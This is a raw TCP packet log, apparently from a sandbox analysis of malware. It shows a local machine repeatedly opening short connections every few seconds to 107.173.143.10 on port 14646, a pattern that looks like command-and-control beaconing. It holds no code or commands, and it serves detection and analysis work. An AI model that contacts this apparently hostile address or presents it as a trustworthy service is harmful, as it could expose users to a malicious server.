Dec 13, 2024 07:39:07.850687027 CET	14646	49810	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:07.850801945 CET	49810	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:07.854870081 CET	49810	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:07.974931955 CET	14646	49810	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:09.795166016 CET	14646	49810	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:09.795351028 CET	49810	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:09.795351028 CET	49810	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:09.915123940 CET	14646	49810	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:10.808973074 CET	49818	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:10.928771019 CET	14646	49818	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:10.928880930 CET	49818	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:10.932670116 CET	49818	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:11.052448988 CET	14646	49818	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:12.870434999 CET	14646	49818	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:12.870517015 CET	49818	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:12.870611906 CET	49818	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:12.990348101 CET	14646	49818	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:13.886713028 CET	49827	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:14.006465912 CET	14646	49827	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:14.006553888 CET	49827	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:14.010746956 CET	49827	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:14.130490065 CET	14646	49827	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:15.948955059 CET	14646	49827	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:15.949037075 CET	49827	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:15.949115992 CET	49827	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:16.068747044 CET	14646	49827	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:16.964111090 CET	49836	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:17.083890915 CET	14646	49836	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:17.084003925 CET	49836	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:17.087569952 CET	49836	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:17.207552910 CET	14646	49836	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:19.026798010 CET	14646	49836	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:19.026890993 CET	49836	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:19.026983976 CET	49836	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:19.146739006 CET	14646	49836	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:20.042388916 CET	49843	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:20.162201881 CET	14646	49843	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:20.162421942 CET	49843	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:20.166038036 CET	49843	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:20.285881042 CET	14646	49843	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:22.129687071 CET	14646	49843	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:22.129857063 CET	49843	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:22.129857063 CET	49843	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:22.249795914 CET	14646	49843	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:23.136830091 CET	49851	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:23.256648064 CET	14646	49851	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:23.257610083 CET	49851	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:23.265655041 CET	49851	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:23.385412931 CET	14646	49851	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:25.217544079 CET	14646	49851	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:25.217756033 CET	49851	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:25.217756033 CET	49851	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:25.337567091 CET	14646	49851	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:26.237348080 CET	49860	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:26.357115030 CET	14646	49860	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:26.357254028 CET	49860	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:26.362354040 CET	49860	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:26.482547045 CET	14646	49860	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:28.291856050 CET	14646	49860	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:28.292063951 CET	49860	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:28.292064905 CET	49860	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:28.411884069 CET	14646	49860	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:29.308814049 CET	49869	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:29.428736925 CET	14646	49869	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:29.428932905 CET	49869	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:29.441555023 CET	49869	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:29.561381102 CET	14646	49869	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:31.369821072 CET	14646	49869	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:31.369970083 CET	49869	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:31.370044947 CET	49869	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:31.489695072 CET	14646	49869	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:32.386199951 CET	49876	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:32.506052971 CET	14646	49876	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:32.506325006 CET	49876	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:32.510449886 CET	49876	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:32.630279064 CET	14646	49876	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:34.452327013 CET	14646	49876	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:34.452550888 CET	49876	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:34.452550888 CET	49876	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:34.572324038 CET	14646	49876	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:35.464457989 CET	49885	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:35.584275961 CET	14646	49885	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:35.584379911 CET	49885	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:35.589247942 CET	49885	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:35.708997965 CET	14646	49885	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:37.526124954 CET	14646	49885	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:37.526345968 CET	49885	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:37.526441097 CET	49885	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:37.646152020 CET	14646	49885	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:38.542741060 CET	49892	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:38.662560940 CET	14646	49892	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:38.663213015 CET	49892	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:38.666423082 CET	49892	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:38.786083937 CET	14646	49892	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:40.604578018 CET	14646	49892	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:40.604671001 CET	49892	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:40.604757071 CET	49892	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:40.724499941 CET	14646	49892	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:41.620876074 CET	49900	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:41.740586042 CET	14646	49900	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:41.740678072 CET	49900	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:41.754255056 CET	49900	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:41.873991013 CET	14646	49900	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:43.699372053 CET	14646	49900	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:43.699446917 CET	49900	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:43.708317041 CET	49900	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:43.828155994 CET	14646	49900	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:44.714438915 CET	49909	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:44.834501982 CET	14646	49909	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:44.837526083 CET	49909	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:44.841193914 CET	49909	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:44.961019993 CET	14646	49909	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:46.780215979 CET	14646	49909	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:46.780364990 CET	49909	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:46.784538984 CET	49909	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:46.904293060 CET	14646	49909	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:47.792620897 CET	49917	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:47.912456036 CET	14646	49917	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:47.912575006 CET	49917	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:47.918087006 CET	49917	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:48.037831068 CET	14646	49917	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:49.855609894 CET	14646	49917	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:49.855712891 CET	49917	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:49.855776072 CET	49917	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:49.975569963 CET	14646	49917	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:50.870537043 CET	49925	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:50.990341902 CET	14646	49925	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:50.990807056 CET	49925	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:50.994394064 CET	49925	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:51.114152908 CET	14646	49925	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:52.952748060 CET	14646	49925	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:52.952850103 CET	49925	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:52.952939987 CET	49925	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:53.072709084 CET	14646	49925	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:53.964772940 CET	49934	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:54.084728003 CET	14646	49934	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:54.088624954 CET	49934	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:54.091866016 CET	49934	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:54.211798906 CET	14646	49934	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:56.046046019 CET	14646	49934	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:56.046189070 CET	49934	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:56.046253920 CET	49934	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:56.166117907 CET	14646	49934	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:57.391259909 CET	49943	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:57.511199951 CET	14646	49943	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:57.511297941 CET	49943	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:57.515124083 CET	49943	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:57.635195017 CET	14646	49943	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:59.468239069 CET	14646	49943	107.173.143.10	192.168.2.6
Dec 13, 2024 07:39:59.468403101 CET	49943	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:59.469003916 CET	49943	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:39:59.588808060 CET	14646	49943	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:00.480163097 CET	49951	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:00.601501942 CET	14646	49951	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:00.605540037 CET	49951	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:00.608958006 CET	49951	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:00.728750944 CET	14646	49951	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:02.593444109 CET	14646	49951	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:02.593668938 CET	49951	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:02.593668938 CET	49951	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:02.713651896 CET	14646	49951	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:03.606029987 CET	49958	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:03.726001024 CET	14646	49958	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:03.726095915 CET	49958	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:03.729861975 CET	49958	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:03.849859953 CET	14646	49958	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:05.692962885 CET	14646	49958	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:05.693031073 CET	49958	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:05.693114996 CET	49958	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:05.812788963 CET	14646	49958	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:06.700016022 CET	49966	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:06.819875956 CET	14646	49966	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:06.819978952 CET	49966	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:06.824733019 CET	49966	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:06.944509983 CET	14646	49966	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:08.796561003 CET	14646	49966	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:08.796633005 CET	49966	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:08.796679974 CET	49966	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:08.916862011 CET	14646	49966	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:09.808322906 CET	49974	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:09.928608894 CET	14646	49974	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:09.928718090 CET	49974	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:09.932162046 CET	49974	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:10.052149057 CET	14646	49974	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:11.871745110 CET	14646	49974	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:11.872216940 CET	49974	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:11.894639015 CET	49974	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:12.014575005 CET	14646	49974	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:12.903340101 CET	49983	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:13.023247004 CET	14646	49983	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:13.023346901 CET	49983	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:13.026870966 CET	49983	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:13.147016048 CET	14646	49983	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:14.964476109 CET	14646	49983	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:14.964551926 CET	49983	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:14.964987993 CET	49983	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:15.084667921 CET	14646	49983	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:16.136779070 CET	49990	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:16.256779909 CET	14646	49990	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:16.257848024 CET	49990	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:16.261285067 CET	49990	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:16.381022930 CET	14646	49990	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:18.199752092 CET	14646	49990	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:18.199825048 CET	49990	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:18.199892998 CET	49990	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:18.320437908 CET	14646	49990	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:19.214484930 CET	49998	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:19.335186958 CET	14646	49998	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:19.335320950 CET	49998	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:19.340518951 CET	49998	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:19.460583925 CET	14646	49998	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:21.277409077 CET	14646	49998	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:21.277535915 CET	49998	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:21.278089046 CET	49998	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:21.397876024 CET	14646	49998	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:22.303082943 CET	50006	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:22.422903061 CET	14646	50006	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:22.423021078 CET	50006	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:22.462865114 CET	50006	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:22.582587004 CET	14646	50006	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:24.355375051 CET	14646	50006	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:24.355592012 CET	50006	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:24.355592012 CET	50006	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:24.475944996 CET	14646	50006	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:25.370884895 CET	50015	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:25.490791082 CET	14646	50015	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:25.491055012 CET	50015	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:25.494900942 CET	50015	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:25.614646912 CET	14646	50015	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:27.434457064 CET	14646	50015	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:27.434885025 CET	50015	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:27.434885025 CET	50015	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:27.554889917 CET	14646	50015	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:28.448987961 CET	50018	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:28.568871975 CET	14646	50018	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:28.568953991 CET	50018	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:28.573971987 CET	50018	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:28.693730116 CET	14646	50018	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:30.512470961 CET	14646	50018	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:30.512639999 CET	50018	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:30.512639999 CET	50018	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:30.632515907 CET	14646	50018	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:31.526961088 CET	50019	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:31.646917105 CET	14646	50019	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:31.647944927 CET	50019	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:31.651781082 CET	50019	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:31.771553040 CET	14646	50019	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:33.691895008 CET	14646	50019	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:33.691994905 CET	50019	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:33.692074060 CET	50019	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:33.811794043 CET	14646	50019	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:34.698909998 CET	50020	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:34.818782091 CET	14646	50020	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:34.818938017 CET	50020	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:34.823895931 CET	50020	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:34.943802118 CET	14646	50020	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:36.765850067 CET	14646	50020	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:36.765950918 CET	50020	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:36.766006947 CET	50020	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:36.886042118 CET	14646	50020	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:37.746102095 CET	50021	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:37.866043091 CET	14646	50021	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:37.866161108 CET	50021	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:37.869719028 CET	50021	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:37.989609957 CET	14646	50021	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:39.812659025 CET	14646	50021	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:39.817467928 CET	50021	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:39.817523003 CET	50021	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:39.937341928 CET	14646	50021	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:40.762350082 CET	50022	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:40.882159948 CET	14646	50022	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:40.882272005 CET	50022	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:40.886478901 CET	50022	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:41.006541014 CET	14646	50022	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:42.824485064 CET	14646	50022	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:42.824567080 CET	50022	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:42.824614048 CET	50022	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:42.944428921 CET	14646	50022	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:43.730220079 CET	50023	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:43.850241899 CET	14646	50023	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:43.852009058 CET	50023	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:43.855866909 CET	50023	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:43.975682020 CET	14646	50023	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:45.793252945 CET	14646	50023	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:45.793353081 CET	50023	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:45.793394089 CET	50023	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:45.913409948 CET	14646	50023	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:46.683199883 CET	50024	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:46.803242922 CET	14646	50024	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:46.803672075 CET	50024	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:46.807343960 CET	50024	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:46.927124977 CET	14646	50024	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:48.750320911 CET	14646	50024	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:48.750423908 CET	50024	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:48.750504017 CET	50024	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:48.870207071 CET	14646	50024	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:49.608515024 CET	50025	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:49.728426933 CET	14646	50025	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:49.728595018 CET	50025	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:49.803968906 CET	50025	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:49.923913956 CET	14646	50025	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:51.668464899 CET	14646	50025	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:51.668612957 CET	50025	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:51.668668032 CET	50025	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:51.788471937 CET	14646	50025	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:52.495775938 CET	50026	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:52.615868092 CET	14646	50026	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:52.616136074 CET	50026	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:52.658555031 CET	50026	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:52.778464079 CET	14646	50026	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:54.584621906 CET	14646	50026	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:54.585616112 CET	50026	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:54.585673094 CET	50026	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:54.705563068 CET	14646	50026	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:55.389858007 CET	50027	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:55.511564970 CET	14646	50027	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:55.512587070 CET	50027	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:55.587475061 CET	50027	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:55.707179070 CET	14646	50027	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:57.449558973 CET	14646	50027	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:57.449727058 CET	50027	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:57.449727058 CET	50027	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:57.569535971 CET	14646	50027	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:58.528317928 CET	50028	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:58.648160934 CET	14646	50028	107.173.143.10	192.168.2.6
Dec 13, 2024 07:40:58.649568081 CET	50028	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:58.664614916 CET	50028	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:40:58.784393072 CET	14646	50028	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:00.590828896 CET	14646	50028	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:00.590897083 CET	50028	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:00.590986967 CET	50028	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:00.710855007 CET	14646	50028	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:01.339287043 CET	50029	14646	192.168.2.6	107.173.143.10
